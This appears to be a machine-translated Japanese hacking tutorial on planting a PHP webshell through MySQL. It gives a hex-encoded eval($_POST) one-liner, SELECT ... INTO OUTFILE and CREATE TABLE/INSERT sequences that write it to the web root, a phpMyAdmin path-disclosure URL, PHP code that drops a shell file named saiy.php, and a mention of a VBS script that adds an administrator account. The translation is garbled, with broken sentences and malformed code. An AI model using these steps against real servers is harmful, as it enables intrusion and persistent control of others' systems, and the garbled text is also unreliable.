php+mysqlを取得

mysql 操作の outfile 'path' に mysql.user から select 0x3C3F6576616C28245F504F53545B615D293B3F3E を入力すると、 の最小馬' が得られます。 5B615D293B3F3E は私たちです＜?eval($_POST [a]);?> 16 進数。この方法は phpmyadmin でより一般的です。最初に phpmyadmin のパスを使用して脆弱性を漏洩します。より一般的な方法は http://url/phpmyadmin/libraries/select_lang.lib.php です。

パスを公開できる PHP 環境では絶対パスを公開する方が簡単です:)。言及すべき点は、Win システムでの mysql のパスは d:\wwwroot\a.php のように記述する必要があることです。次の方法は、WebShell をエクスポートするためによく使用される方法です。システム管理者を追加する vbs スクリプトを作成し、システムの再起動後に管理者アカウントが追加されます

CREATE TABLE a(cmd)。 text NOT NULL)
INSERT INTO a(cmd) VALUES('＜?fputs(fopen("./a.php","w"),"")? ＞' )
select cmd from a into outfile 'path/b.php'
DROP TABLE IF EXISTS a
b.php にアクセスすると、 の最小ホースが生成されます。
実行可能な php コマンドが見つかったら、その代表的なものは、バックグラウンドの php コマンド ボックスに次のコードを入力します。
＜?
$sa = fopen("。 /up/saiy.php", "w");
fwrite($sa,"＜?eval($_POST[a]);?".">");
fclose($sa);
?>

上のディレクトリに生成されます ファイル名はsaiy.php、内容は 最後に、Lankerのクライアントを使用して接続します。実際のアプリケーションでは、フォルダーに書き込み権限があるかどうかを考慮する必要があります。または、次のようなコードを入力します")?> 現在のディレクトリに a が生成されます.php 内の最小の馬。